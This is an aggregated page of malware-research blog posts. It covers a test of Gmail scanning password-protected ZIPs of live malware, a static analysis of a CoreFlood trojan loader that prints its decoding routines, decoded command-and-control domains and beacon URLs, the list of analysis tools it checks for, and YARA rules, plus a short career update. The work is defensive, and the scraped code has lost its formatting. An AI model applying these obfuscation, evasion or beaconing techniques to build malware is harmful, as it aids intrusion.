Quantcast
Channel: Ghetto Forensics
Viewing all 52 articles
Browse latest View live

Is Google Scanning Malware Email Attachments Between Researchers

$
0
0
Disclaimer: This post is based upon experiences I found when sending malware via GMail (Google Mail). I'm documenting them here for others to: disprove, debate, confirm, or to downplay its importance.

Update:

In the comments below, a member of Google's AntiVirus Infrastructure team provided insight into this issue. A third-party AV engine used by GMail was designed by the third-party to automatically open ZIP files with a password of 'infected'. I want to thank Google for their attention to the matter as it shows that there was no ill-intent or deliberate scanning.

Original Post:


As a professional malware analyst and security researcher, a sizable portion of my work is spent collaborating with other researchers over attack trends and tactics. If I hit a hurdle in my analysis, it's common to just send the binary sample to another researcher with an offset location and say "What does this mean to you?"

That was the case on Valentine's Day, 14 Feb 2014. While working on a malware static analysis blog post, to accompany my dynamic analysis blog post on the same sample, I reached out to a colleague to see if he had any advice on an easy way to write an IDAPython script (for IDA Pro) to decrypt a set of encrypted strings.

There is a simple, yet standard, practice for doing this type of exchange. Compress the malware sample within a ZIP file and give it a password of 'infected'. We know we're sending malware samples, but need to do it in a way that:

          a. an ordinary person cannot obtain the file and accidentally run it;
          b. an automated antivirus system cannot detect the malware and prevent it from being sent.

However, on that fateful day, the process stopped. Upon compressing a malware sample, password protecting it, and attaching it to an email I was stopped. GMail registered a Virus Alert on the attachment.

Stunned, I try again to see the same results. My first thought was that I forgot to password-protect the file. I erased the ZIP, recreated it, and received the same results. I tried with a different password - same results. I used a 24-character password... still flagged as malicious.

The instant implications of this initial test were staggering; was Google password cracking each and every ZIP file it received, and had the capability to do 24-character passwords?! No, but close.

Google already opens any standard ZIP file that is attached to emails. The ZIP contents are extracted and scanned for malware, which will prevent its attachment. This is why we password protect them. However, Google is now attempting to guess the password to ZIP files, using the password of 'infected'. If it succeeds, it extracts the contents and scans them for malware.

Google is attempting to unzip password-protected archives by guessing at the passwords. To what extent? We don't know. But we can try to find out.

I obtained the list of the 25 most common passwords and integrated them (with 'infected') into a simple Python script below:


importsubprocess
pws=["123456","password","12345678","qwerty","abc123","123456789","111111","1234567","iloveyou","adobe123","123123","sunshine","1234567890","letmein","photoshop","1234","monkey","shadow","sunshine","12345","password1","princess","azerty","trustno1","000000","infected"]
forpwinpws:
cmdline="7z a -p%s %s.zip malware.livebin"%(pw,pw)
subprocess.call(cmdline)

This script simply compressed a known malware sample (malware.livebin) into a ZIP of the same password name. I then repeated these steps to create respective 7zip archives.

I then created a new email and simply attached all of the files:


Of all the files created, all password protected, and each containing the exact same malware, only the ZIP file with a password of 'infected' was scanned. This suggests that Google likely isn't using a sizable word list, but it's known that they are targeting the password of 'infected'.

To compensate, researchers should now move to a new password scheme, or the use of 7zip archives instead of ZIP.

Further testing was performed to determine why subsequent files were flagged as malicious, even with a complex password. As soon as Google detects a malicious attachment, it will flag that attachment File Name and prevent your account from attaching any file with the same name for what appears to be five minutes. Therefore, even if I recreated infected.zip with a 50-char password, it would still be flagged. Even if I created infected.zip as an ASCII text document full of spaces, it would still be flagged.

In my layman experience, this is a very scary grey area for active monitoring of malware. In the realm of spear phishing it is common to password protect an email attachment (DOC/PDF/ZIP/EXE) and provide the password in the body to bypass AV scanners. However, I've never seen any attack foolish enough to use a red flag word like "infected", which would scare any common computer user away (... unless someone made a new game called Infected? ... or a malicious leaked album set from Infected Mushroom?)

Regardless of the email contents, if they are sent from one consenting adult to another, in a password-protected container, there is an expectation of privacy between the two that is violated upon attempting to guess passwords en masse.

And why is such activity targeted towards the malware community, who uses this process to help build defenses against such attacks?

Updates:
There was earlier speculation that the samples may have been automatically sent to VirusTotal for scanning. As shown in the comments below, Bernardo Quintero from VirusTotal has denied that this is occurring. I've removed the content from this post to avoid any future confusion.

Others have come forth to say that they've seen this behavior for some time. However, I've been able to happily send around files until late last week. This suggests that the feature is not evenly deployed to all GMail users.


Notes:

  • Emails were sent from my Google Apps account.
  • Tests were also made using non-descript filenames (a.txt).
  • Tests were made to alter the CRC32 hash within the ZIPs, and any other metadata that Google could target.
  • The password "infected" was not contained in the subject nor body during the process.

Malware with No Strings Attached Part 2 - Static Analysis

$
0
0
In the previous post I showed some dynamic analysis procedures for a variant of a trojan known to Symantec as Coreflood. Based on the dynamic analysis, we discovered that the analyzed sample contained very few strings of use. It decrypted an embedded executable, which was injected into memory for execution. It dropped an encrypted file to the hard drive, then downloaded a second-stage executable from the Internet. This downloaded file was then encrypted in what appeared to be a similar routine as the dropped file.

However, in the end, we still had many questions that couldn't be answered:

  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.exe?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why does the initial loader contain so few strings?
These questions are best answered through static analysis. However, static analysis can be an extremely time-consuming activity. A full "deep dive" static analysis could take days, or even weeks, to fully document all functionality within a malware sample. Instead, this post will go through the process of a targeted static analysis. With the questions laid out here, we'll focus our static analysis solely on answering those questions, which will mean leaving many aspects of the malware undocumented.

Therefore, we need to focus on what questions can be answered within an hour or two of static analysis.

These questions mirror some of those performing Incident Response work. During incident response work a malware analyst works in conjunction with forensics and the responders to help answer the really difficult questions on why certain indicators are seen, what they mean, and what other indicators should be searched for that may have been missed.

This also answers the concerns of inaccurate preconceptions from those outside the field. When I tell a client that a sample has encoded data and will take a bit longer, I immediately get push back on the expectation that a simple routine may add 40+ hours of billable time. Likewise, if I say that a sample has a custom encryption routine, I'd often get pinged every hour on why it's not decoded yet. 

This post will show some of my personal workflow and mentality when trying to analyze malware, while trying to extract indicators to assist in an overall forensics examination or incident response. As I'm new to much in the RE world, having only learned through self-training and on-the-job work, I'd love any feedback for ways in which to speed up or better hone topics that I covered here.


First off, we'll be using IDA Pro in this post. IDA is a commercial tool that is used for in-depth static analysis. There is a free version of IDA available for download, though very outdated. The newest versions of IDA also have an optional decompiler, at an additional cost. For general use, however, the pay-to-play cost is out of reach of many reversing hobbyists.

Alternatively, there's Hopper - a commercial, but very inexpensive, static analysis tool. Hopper has a decompiler built in, but its feature set (and decompiler ability) lags greatly behind IDA.

For our purposes here, both are usable. I use IDA Pro at work and have a license for home, though the home one is limited to an older version. I also have a personal Hopper license to play with as needed. 

For simple static analysis, Hopper is all you need, as shown in the chart below. As the complexity of the samples increase, you may need to move to IDA Pro for its functionality (or use Hopper and take really good notes). To compare the differences, note the graphic below showing IDA Pro on the left, Hopper Decompiler on the right:



Now, let's get started with this sample from the earlier post. For the sake of this post, I will stick to the IDA Pro.

Loader Analysis

In Part 1 of this post, we performed dynamic analysis on the sample and ultimately determined that the initial file was a memory loader for the actual Trojan. This creates the issue of two separate files that require analysis. We'll separate our analysis between the loader (here) and the trojan (farther down).

Before performing in-depth analysis, we need to do basic normalization of the file. This includes decoding any encoded strings, resolving any API calls, and generally getting all of the small hurdles out the way.

Encoded Windows API 

Earlier string analysis showed a distinct lack of API calls. So, one of our first steps is to learn for any traces of API resolution, typically in the form of API name "strings" being passed to GetProcAddress().

Looking at the initial start() routine, there are a few things that pop out. There's liberal use of global DWORD variables, seen as "dword_<address>". This is also one of Hopper's weak points, as changing a global variable name in one routine does not cross over to others, IDA is better equipped to handle malware like this.



These global DWORDs are seen being used to store values and, at near the bottom, as APIs. (call dword_40CAF0). From this we know there is some dynamic API resolution occurring within the code, but we still have a lack of strings from which APIs could be resolved from. If there is dynamic API resolution, it will occur very early in the runtime. So, let's start down the subroutines chronologically.

One of the first calls is to push a block of raw data (unk_40C8DC). This data appears as:




From the start of the data, down to the nulls at the end, this appears lightly encoded. 

Before handling that data, the code calls GetModuleHandleA("kernel32.dll") and places the result into dword_40CAAC. Name the DWORD with a description (kernel32_handle) and proceed. Now we see the unknown block of data being passed into sub_4012E0


If we follow this data onward, we see it passed into sub_401200. The portion of this subroutine that decodes the block of data is shown below:




This routine steps through the data until the position (ebp+var_4) is at 234 bytes, a number which coincidentally is the exact size of the data block. For each iteration, four bytes of data are extracted. The DWORD integer value of those four bytes is subtracted by the position offset. The value is then subtracted again by the hex value 0x85BA. Being a Python person, I duplicated the process with:


importstruct
data=open('api_data','rb').read()
result=''
forposinrange(0,232,4):
temp=struct.unpack('l',data[pos:pos+4])[0]
temp-=pos
temp-=0x85BA
result+=struct.pack('l',temp)
printresult

Upon execution, this data decoded to a set of null-terminated strings:

ìetWindowsDirectoryA VirtualAlloc VirtualFree CreateFileA HeapAlloc GetProcessHeap VirtualProtect MapViewOfFileEx LoadLibraryA UnmapViewOfFile CreateFileMappingA CloseHandle GetProcAddress lstrcatA FindAtomA AddAtomA GetModuleHandle

We've found our API calls! The first one is off, likely due to the malware keeping the first byte back for inclusion later on. But, wait, there's more. In the IDA graph above there's a second set of instructions on the right side for '3etProcAddr'. Knowing our APIs, that should be GetProcAddress. A look at this code shows that it's basically doing a memcpy() of '3etProcAddr' into 0x40CB20. Immediately afterward are direct byte placements into specific offsets. Byte 0x40CB20 becomes 'G', which replaces the '3'. 0x40CB2B0x40CB2C0x40CB2Dand 0x40CB2E are all set to "ess\00" respectively. Knowing this, I rename &byte_40CB20 to a description 's_GetProcAddress' (s_ denoting a string).

Immediately afterward we see the earlier named kernel32_handle passed into sub_401130. Delving in here, I see the presence of 's_GetProcAddress' from just above. Without going into more analysis, I can make a very good guess that this routine just resolves the API of GetProcAddress and returns it. Sure enough, in our decoding routine, I see the result placed into the global dword_40CAF0, which I now rename to 'api_GetProcAddress'. 

If I follow the references (XRefs) to api_GetProcAddress, I see a usage in a subroutine we haven't looked at yet, sub_401DF0. Going there is a very simple routine the decompiles to simply:



Ding! With that known, we can rename sub_401DF0() to ResolveAPI(), and see how it's used. (Astute analysts will realize there's something wrong here... we'll come back to that later)



API Assignments


When I work my way back to where this block of APIs is being used, I see this block of code that is best represented in decompiler view:



This is just a small segment of the overall routine, but it shows the parsed API strings being resolved. Their resolved API hashes (stored as a DWORD) are then placed into a sequential series of DWORDs starting at 0x40CAC0 (which I've named API_List). A separate global DWORD (named API_Counter) is used as an incremental counter to apply each string to its DWORD value. 

When I view that list of DWORDs, started at 0x40CAC0, I see a series of sequential global DWORDs just waiting to contain APIs:




Our first inclination would be to just go down the line and rename them all based upon our text API strings. This would be wrong :) Why? Because take a careful look at the offsets, particularly those with an 'align 10h' by them. There are no DWORDs associated with these locations; the APIs are being resolved during runtime but IDA is showing us that they are never actually in use. We can confirm the offsets and locations by viewing the results in a debugger.




So, by counting carefully, we can scratch off CreateFileA, lstrcatA, FindAtomA, and AddAtomA. When done, the list should look like this:


Some people may notice a small error in this setup. When resolving APIs, the malware tried to resolve the API of "ìetWindowsDirectoryA", which is obviously not valid. The first DWORD should be for GetWindowsDirectoryA(), but because of the corrupted first byte, it didn't resolve and appeared as four nulls in the debugger output above. Had it worked, my DWORD of API_List should have been GetWindowsDirectoryA.


Now, when we go back and look through the code, functionality will be much clearer.


IDA Pro Decompiler Errors


One of the hardest lessons to learn with IDA Pro is to never trust the decompiler. For really quick static analysis, it's a life saver. You can breeze through malware samples, quickly determining the overall functionality with ease. But, when it comes to the small intricacies there are usually errors in its output.  

This is apparent in this sample. In the earlier routine, where the resolved API calls are placed into a series of global DWORDs, the decompiled output appeared as:




However, at a glance, this doesn't make any sense. Why would a variable container hold the results of the same call over and over? How would a function that resolves an API take only the handle to kernel32.dll? 

The problem exists within the function named ResolveAPI():


However, when this function is decompiled, it appears as:





There's a massive difference in functionality. For one, the return block (disassembly view bottom right) references two function parameters (arg_0 and arg_4). But, the decompiler only registered one parameter. With this in mind, let's go up a routine and see how data is being passed in:



There are two pushes before the call: the expected kernel32_handle but also API string value. This changes the meaning completely and finally lets the code make sense.

Oh, and Hopper decompiled it just fine :)


At this point we've been able to answer one of our initial questions:
  • Why does the initial loader contain so few strings?
It's because the strings are custom encoded and are decoded at runtime.

Finding the Injected Executable


With the basic framework in place to determine functionality, we can now look for that injected executable that we suspected during dynamic analysis. One aspect that makes it pretty apparent is the large block of tan coloring in the navigation band. This refers to stored data within the file.

The most obvious way to see what's occurring is to go to the first byte of this block of data and xref from that to find where it's being used. In this case, there's one reference to it within the start() routine:





Following that reference we see a pretty large block of code dealing with it. I find it best to represent it as decompiled below, with my variable names already applied:





There is a lot of code here to do something very simple; copy the block of data to another memory space 100 bytes at a time. Then, once done, references a XOR_decode():




Now, note that the code from the decompiled view doesn't actually send four-bytes at a time into XOR_decode(), even though it decodes by DWORDs. Instead, it sends in the current byte position (in increments of 4) and lets XOR_decode() reference the data by its global DWORD location (seen here as decoded_exe). What XOR_decode() does is add that passed position number to 0x85BC, then performs a 4-byte XOR against the current block of data.

Therefore, on the first round, the first four bytes will be XOR'd by 0x85BC. On the second, 0x85C0, then 0x85C4. When complete, you'll have a fully qualified executable (as seen by a debugger):



If you dumped it here, or decoded it manually, you'll find it identical to the one that we already extracted in Part 1 using Volatility.


Injected Malware Analysis


With the functionality of the loader complete, we'll close it out and focus on the injected module. As before, this will be a very targeted bag and tag. We have some very specific questions we need answered, but first let's see if there is any groundwork that needs to be completed, such as encoded strings and API resolutions.


Encoded Strings


When we look through the strings of the binary, there are a number of very odd ones that stick out. They're referenced by the code and are likely encoded like the ones in the loader binary.



If I follow them back to see how they're used, some are used in a way that suggests that they're regular strings. For example, this one routine sends them into a subroutine that treats them as HTTP hosts. This suggests that the strings are replaced in-line during execution; the original string is overwritten by the decoded version. Following the string references, I finally see a routine that decodes them, show in decompiled form below:



This routine takes the length of each string and sends it into a routine that I've already named XOR_decode(). XOR_decode() takes the string, the hardcoded value of 15 (0xF) and the length of the string. When viewing the decode routine, it's quite apparent that the 15 (0xF) is a key value and is used in the following loop:





There's a few odd things here. It looks like a basic FOR loop; ESI in incremented after each loop and compared against the string length to break out. I see a byte-by-byte XOR decoding, but there's a small twist. The ECX register is increased in every loop but, once it reaches 3, it resets to 0. 

The passed key (0xF) is placed into DL (EDX), then added to by CL (ECX). The resulting value is XOR'd against the respective byte. This literally just makes a five-byte XOR key of 0x0F101112.

After finding the code references to XOR_decode(), we have another problem. The key value varies in some calls... If there's a lot of calls, and many variations on the key, we may have to write an IDA script to do this. To see how they're called, let's drop the ASM output to a text file and grep it to see what values are pushed into the routine:



>grep -B 5 "call.XOR_decode" injected.asm | grep "h$" | sort
       push    0Eh
push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Eh push 0Fh push 0Fh push 0Fh 

This is promising. There's roughly 14 total calls and most of them are with the same key (0x0E). There will likely be more calls, as the key could've been placed into a reusable variable. This is totally within the realm to do it manually. To do this, I pulled the relevant strings out and wrote a Python script to do the conversion:



defdecode(str,key):
pos=0
result=''
foriinrange(0,len(str)):
result+=chr(ord(str[i])^(pos+key))
ifpos<=3:
pos+=1
else:
pos=0
returnresult

strings=[{'nsrgandttzcub<p`}',0xF},
{'\x6A\x7C\x62\x7D\x63\x63\x7F\x7F\x75\x67\x21\x73\x7E\x7F',0xF},
{'\x6A\x64\x3C\x66\x61\x6A\x63\x7A\x73\x3D\x6C\x7F\x7C',0xF},
{'\x63\x65\x7D\x73\x7D\x68\x7F\x3F\x71\x7C\x62',0xF},
{'\x7D\x7B\x71\x3E\x79\x60\x60\x73\x7A\x3C\x7E\x67\x60',0xE},
{'<>"?#<;> #6!!%%',0xE},
{'\x64\x71\x63\x73\x74\x6E\x7E\x75\x73\x3D\x6C\x7F\x3F\x71\x70',0xF},
{'\x7B\x62\x22\x3D\x6B\x68\x71\x65\x77\x3D\x7F\x78\x61',0xF},
{'\x59\x66\x62\x74\x61\x66\x6E\x62\x2A\x7D\x63\x62\x46\x78\x77\x79\x34\x58\x45\x46\x5E\x2F\x51\x7F\x73\x62\x76\x6A\x2A\x46\x7C\x6E\x73\x74\x42\x62\x7A\x63\x22\x20\x35\x41\x75\x65\x65\x61\x7D\x7B\x31\x53\x60\x6E\x7C\x68\x68\x35\x47\x44\x45\x42\x2E\x5C\x7E\x78\x74\x35\x49\x79\x75\x76\x62\x6A\x62\x2A',0xE},
{'\x6F\x6B\x7F\x73\x77\x20\x6C\x7F\x7C\x29\x69\x6A\x7F\x3E\x62\x7C\x60\x74\x64\x71\x7A\x66\x74\x3F\x62\x66\x7F\x2B\x7A\x77\x7C\x61\x75\x7D\x21\x3C\x34\x65\x62\x77\x7C\x3C\x22\x2A\x65\x67\x61\x79\x7F\x77\x7A\x34\x65\x63\x7E\x63\x60\x7E\x2A\x5A\x5A\x5B\x40\x2A\x62\x6A\x6E\x64\x74\x3C\x6B\x34\x51\x41\x42\x4A\x4E\x44\x50\x29\x4F\x6B\x7F\x73\x77\x35\x7F\x7C\x64\x75\x7D\x34\x51\x75\x70\x5B\x7F\x74\x3F\x7E\x60\x64\x2B\x74\x6A\x7E\x63\x7F\x63\x77\x7C\x21\x75\x69\x77\x35\x67\x64\x65\x62\x34\x34\x74\x7E\x65\x60\x6A\x68\x74\x71\x35\x7A\x60\x75\x73\x7A\x6A\x7D\x74\x29\x76\x6B\x79\x74\x6A\x35\x77\x62\x74\x70\x61\x60\x64\x69\x29\x6A\x6A\x7C\x74\x66\x6B\x7F\x7C\x64\x75\x67\x61\x2B\x7D\x7D\x6F\x6B\x60\x7D\x67\x69\x66\x7E\x2B\x29\x5B\x7F\x74\x70\x66\x6B\x34\x45\x65\x7B\x62\x34\x45\x65\x7B\x62\x21\x75',0xE},
{'\x6F\x6B\x7F\x73\x77\x20\x6C\x7F\x7C',0xE},
{'\x63\x66\x73\x63\x7D\x7D\x60\x76\x65\x3C\x6D\x60\x7D',0xE},
{'\x7B\x7F\x74\x70\x66\x6B\x20\x76\x78\x7C\x6A\x7A\x60\x75\x73\x7A\x6A\x3E\x61\x7A\x7E',0xE}]

fordata,keyinstrings:
decoded=decode(data,key)
print"%s => %s"%(data[0:10],decoded)

Upon execution, the results are pretty telling:


>decode_strings.py
nsrgandttz=>accuratefiles.com
j|b}cc¦¦ug=>elsoplongt.com
jd<fajczs==>et-treska.com
ce}s}h¦?q|=>lulango.com
}{q>y``sz<=>sta/knock.php
<>"?#<;> #=>212.124.118.147
dqcstn~us==>karaganda.co.cc
{b"=khqew==>tr3/xgate.php
Yfbtafnb*}=>Wireshar;ommView;HTTPAnalyz;TracePlus32;NetworkAnalyz;HTTPSnif;Fiddler;
ok⌂sw l⌂|) =>adobe.com;geo/productid.php;kernel32;user32;wininet;urlmon;HTTP;pdate.e;APPDATA;Adobe;plugs;AdbUpd.lnk;explorer.exe;http:;downexec;updateme;xdiex;xrebootx;deleteplugin;loadplugin:;Update;Util;Util.e;
ok⌂sw l⌂|  =>adobe.com
cfsc}}`ve<=>microsoft.com
{⌂tpfk vx|=>update/findupdate.php

Alternatively, this could be done via an IDAPython script. However, I'm personally weak with such, especially when the strings are not pushed directly into the routine; they're assigned to a variable much earlier. I would love to learn how to write a script to do this, though.

At this point, many examiners would just leave these strings on a list to reference, or put them into the code as comments. However, I'm an old school patcher and prefer to replace the strings in the executable itself. As this is a byte-by-byte encoding routine, we can literally replace the encoded byte with their decoded equivalents within the executable by using a hex editor. 

Make a backup copy of the executable then edit the original to find/replace the encoded strings. When done, go to IDA and select File -> Load file -> Reload the input file.

Now, once replaced, the before and after results are pretty awesome:


Before:



After:


As there are no other noticeable forms of obfuscation, we have our executable to a ready state to continue analysis and answer the questions.

One thing to note, as we'll see it during analysis, is a rather interesting lookup function. The large decoded string "adobe.com;geo/productid.php..." is a series of configuration strings in one set. The sample has a basic lookup routine that is passed an integer number. The routine then retrieves that numbered item for usage in whatever function. This is just another form of obfuscation, but also allows for quick portability settings when infecting different regions or targets with the same malware.

Another similar configuration string was found with encoded values intersposed with normal text, resulting in the adobe.com, microsoft.com, and findupdate strings above. This string appeared, in full, as another series of configuration settings used by the malware:

sss:::adobe.com;;;microsoft.com;;;update/findupdate.php;;;6000;;;1;;;0;;;

Dropped / Renamed Files

  • What is the encryption routine used for thr1.chm and mmc109.exe?
To determine the structure of thr1.chm, let's first determine where it's written to from the code. By a few simple string searches I found a reference "thr1" and to ".chm". First, the "thr1" appears in the context of:


The structure here, "shedexec:thr1:", and the earlier "shedscr:3:120 <url>" suggest that there's a configuration structure written into the malware with the 'exec' field being thr1. This string is passed into sub_4035F1 which does the following with it:


From these results (shown in decompiler for brevity, and because it won't error out on this :)), we see that sub_4035F1 will take the "shedexec:thr1:" value and parse it for values within colons. This value, "thr1" is then appended to a predefined path of %AppData%\Adobe\shed\ (which we saw in dynamic analysis) and further appended by the extension ".chm", making %AppData%\Adobe\shed\thr1.chm.

We see that unknown data is XOR encoded using the same routine as the strings, and a key of 0xE (14). There's no indication here what that data is, but since we have the file from dynamic analysis we can decode it to receive:

3 http://presentpie.vv.cc/showthread.php?t=332864

Interesting, as these values were also seen two screenshots up in reference to the C2 URL. The meaning of the number is unknown at this point, but we do have the URL that we saw during dynamic analysis AND we know the purpose of the thr1.chm file, to store the C2 beacon address.


  • Why does the malware rename mmc109.exe to mmc61753109.exe?

My first inclination is to search strings for "mmc" or ".exe". Neither found results. I then searched the entire binary for those strings in a hex editor; again, nothing. I then check out the import table and see some interesting traits.

The sample uses CreateDirectoryW, CreateFileW, MoveFileW, and MoveFileExW. Not many samples exclusively use unicode (*W) calls. It's also interesting that both MoveFileW and MoveFileExW are in play, where the latter allows extra control over how files are moved. Typically a sample would just use the basic MoveFileW().


As I access each subroutine that called MoveFileW and MoveFileExW, I spot one that answers our question, shown decompiled below:




There's our "mmc" text, stored as Unicode. I was performing ASCII text searches before, so I missed the reference. To avoid missing this, in your IDA strings display, right click on any string and Setup -> Enable Unicode. However, you'd also need to lower your string length threshold accordingly, which means some strings may still be missed if they're extremely short.

Now, in this routine, I see a folder path being created; following the word_408CB8 back, I see it given the value of the folder %AppData%\Adobe. From there, "\mmc" is tacked on, then two strings are made from that.

String one becomes %AppData%\Adobe\mmc%d.exe, where %d is a number retrieved from _rdtsc():

v2 = __rdtsc();
v3 = (16807 * ((HIDWORD(v2) ^ v2) % 127773) - 2836 * ((HIDWORD(v2) ^ v2) / 127773)) % 100000 % 255;
v4= lstrlenW(&FN_exe);
wsprintfW(&FN_exe +
v4, L"%d", v3);

The second string becomes %AppData%\Adobe\mmc%d.txt where %d is a number retrieved from GetTickCount():

v5 = GetTickCount();
v6 = lstrlenW(&FN_txt);
wsprintfW(&FN_txt
+ v6 , L"%d", v5);


There's where our file names originated.

If, upon execution, the mmc%d.exe already exists, then it is moved to its new mmc%d.txt name.

The rest of this function shows the malware try to download a file from the configured URL, make sure it was saved correctly, then check to see if it has a valid PE Header (begins with "MZ", has a "PE" at the right spot). If it doesn't, then XOR decode it with a key of 0xE and try again. Worked? Great! 

Analysis then shows that the .TXT file is a temporary storage location for the executable file. It's likely that this is the allow for updates; moving the current second-stage to a backup file while downloading a new version. Another subroutine (sub_4038AC) shows similar functionality that suggests it is used for trojan updates, however that subroutine creates a folder %AppData%\Adobe\mmc_install.

That should explain most of the file activity we saw during dynamic analysis. Now, onto other things.

Network Beacon Structure

  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
During runtime we saw a POST request to www.adobe.com/geo/productid.php. This actual URL didn't exist on Adobe's site, and wasn't found in the loader, so where did it come from? And why was it sent?

Since we've already performed string decoding, we've seen these strings pop out at us already. Remember this string?

adobe.com;geo/productid.php;kernel32;user32;wininet;urlmon;HTTP;pdate.e;APPDATA;Adobe;plugs;AdbUpd.lnk;explorer.exe;http:;downexec;updateme;xdiex;xrebootx;deleteplugin;loadplugin:;Update;Util;Util.e;

Following the routines that query this string, I see the request made in the major downloader thread:



We see it retrieving the first item (configuration_string_0 = adobe.com) and the second (geo/productid.php). It then passes these to a function I've named SendFakePOST() for reasons that are clear below:




This routine takes the server name (cp) and URL (lpString2) and creates a fake HTTP request packet. This packet is then sent and any response is received with recv(). ... And then nothing. It returns and the malware continues on. This HTTP request has no impact on the operation of the malware. Or.. does it?

The payload of the packet is seen above as lpString. When we trace that back in the code, it's the result of a function I've named GetHardDriveInfo(), shown below:





This function has the role of calling certain operating system information and constructing it into a string. My function name was a little short sighted, but fits for now. This routine is basically creating a string of:

_%d_%d_%d

The first %d is the result of a specialized Windows OS checking routine, where a Windows XP system (Major 5, Minor 1) is given the number 6. This is a pretty generically written routine and doesn't need to be shown here.

The second value is the result of GetUserGeoID(), "244". Based on Microsoft's Yet Another Table Of Geo Lookups, this number corresponds to the United States.

The final number is an integer representation of your operating system's partition volume serial number. For example, my serial number is 56F2-F7D9 (as obtained by running 'dir'), which is 1458763737 as an integer. When checking with the network traffic from dynamic analysis, everything seems to line up:



While the malware would transmit a beacon to this host, and disregard its response, this action was very critical. It was a first-stage beacon giving your operating system information to the C2 host. In this case, your external IP address, operating system, geographical location, and volume serial number. The last is important for the actor to key in on a unique system out of a set.

Why adobe.com? Obviously that wouldn't work. The only obvious answers are that either there is a localized DNS spoof or if the traffic was being sniffed on the local network.

Conclusions

When we started static analysis, we were given a clear set of questions to answer:



  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.exe?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why does the initial loader contain so few strings?

We were able to go in with static analysis and target the answers to each of these. We know the purpose of the loader and how it encoded its strings. We know what encoding routine was used to encode files during dynamic analysis, and what they contained. We know the meaning of the network beacon to adobe.com and the importance of its numbers.

Now what do we do with this newfound knowledge? Write signatures! Preferably YARA rules, written to key on binary data. The challenge is that YARA rules are typically written for data-at-rest, so data found within the injected executable have a very little chance of exposure. So, we'll need to focus on unique aspects of the loader.
While I disdain YARA rules based upon ASCII strings, there are a handful of interesting ones: MlLrqtuhA3x0WmjwNM27 in reference to a registry key and "3etProcAddr" for GetProcessAddress.

The most unique aspect, however, is the data and string decoding routines. The string decoding routine was based upon subtracting the byte position, and the number 0x85BA, from each DWORD. As this is a unique DWORD value, we can key in on that. Turn on the opcode bytes within IDA and examine the hex bytes:


.rdata:0040123A 81 EA BA 85 00 00                 sub     edx, 85BAh
.rdata:00401476 05 BC 85 00 00                    add     eax, 85BCh

In action, this set of rules would look similar to:

rule CoreFlood_ldr_strings
{
  meta:
author = "Brian Baskin"
date = "13 Feb 14"
comment = "CoreFlood Trojan Loader Strings"

  strings:
$RegKey = "MlLrqtuhA3x0WmjwNM27"
$API = "3etProcAddr

  condition:
all of them
}

rule CoreFlood_ldr_decoder
{
  meta:
author = "Brian Baskin"
date = "13 Feb 14"
comment = "CoreFlood? Trojan Loader Decoding Keys"

  strings:
$Sub_85BA = { 81 EA BA 85 00 00 }
$XOR_85BC= { 05 BC 85 00 00 } 

  condition:
all of them
}

At this point, we would want to test this rule across multiple files to ensure that there are no false positives, and that it does hit in on variants. This is best performed using a large-scale internal malware database, that like provided by VXShare.


Looking for hardcoded network traffic will also help us write signatures for Snort or other IDSs. For example, in static analysis, we found the initial HTTP POST traffic sent using a hardcoded user agent of "User-Agent: Opera/10.80 Pesto/2.2.30". This could easily be used to create a signature, after performing a bit of research to determine the commonality of it.

Anything Else?


With the questions answered and rules written, there is a lot of functionality within the trojan that was not analyzed. This was a 1-hour targeted static analysis, so many things were skipped over, or just guessed at. Had this been a proper deep dive (3-4 days) we would have function properly named with all runtime trees documented.


The name here is a bit of an issue. Why is it called CoreFlood? That's what the AV companies called it. However, you don't have to follow their naming conventions for your own malware databases (and many people don't). Based on data presented from the Trojan the two things that pop to mind are 'mmc' and 'shed' as possible names given to the Trojan by its author. The update routine of 'mmc_install' is prominent, but so is the 'shedexec', 'shedscr', and 'delshed' configuration settings. The 'thr1' name was also interesting, but at a lower level; it's possibly a campaign identifier or an actor's initials or signature.

A cursory analysis showed time-based logic in execution. For example, the sample appears to be set to not run before 15 Dec 2010. It will also check the creation time of a local file named Adobe.cer and compare the date against that.

The sample has cursory anti-analysis techniques by comparing the text strings in a list against all of the running processes. This text was composed of:

Wireshar;ommView;HTTP Analyz;TracePlus32;Network Analyz;HTTP Snif;Fiddler;

If this sample was giving issues with dynamic analysis tools, you could easily decode this string, modify it, re-encode it and place it back into the executable.

Why does the sample download a the mmc%d.exe file and check if it's file size is less than 3000?

What does the number "3" mean in front of the URL?

Is there a C2 command structure?

We'll note those questions for later analysis or present them to a client to determine if they're worth spending the time and money to answer.

Moving On to New Career Opportunities

$
0
0
In the next few days I will be moving on from my current work and into a new and exciting opportunity. As I work through this effort, while writing a book and preparing con talks, I started to think of the practical and emotional tasks needed to ensure that my current employer and clients are taken care of while I prepare for the future.

In this effort, I wanted to pass on a few ideas that may help others.

Personal Side


To begin with, let's discuss the personal side to the move. I've been working with the Defense Cyber Crime Center (DC3) for almost 14 years. I've been with them since before they were even named DC3, and were just the Defense Computer Forensics Lab (DCFL) and the Defense Cyber Investigations Training Program (DCITP a.k.a. The 'TIP). Also, since we had "Cyber" in our agency name since the late 90's, I'm fully allowed to use it in regular conversation without drinks.

I've said goodbye to DC3 once before, temporarily, as I moved on from being the Deputy Technical Lead of the Training Academy. I left with the weight of a serious case of burnout (i.e. with medical intervention), helping lead development of 20+ technical courses, managing my own technical team, and being a technical lead and presenter on a large contract re-compete... while helping write a book. I needed a break and getting into the down and dirty of regular forensic cases was the fix.

I joined my good friends Eoghan Casey, Terrance Maguire, and Chris Daywalt in their venture, cmdLabs as employee #1. We worked out awesome incident response cases together and delved into research projects and code development. At about this time, cmdLabs was acquired by Newberry Group, run by a CEO and VP that I had known for over a decade. Life was good and, after a cool-down period, I went back into DC3 on a separate contract to work on their Intrusions team.


In Intrusions I was thrown to the wolves, having to learn everything from scratch to become one of their malware reverse engineers. Within a few months I was writing automated decryptors for custom encryption, and after a few years was running the gamut of malware, file systems, log analysis and PCAPs as a senior member of the team.

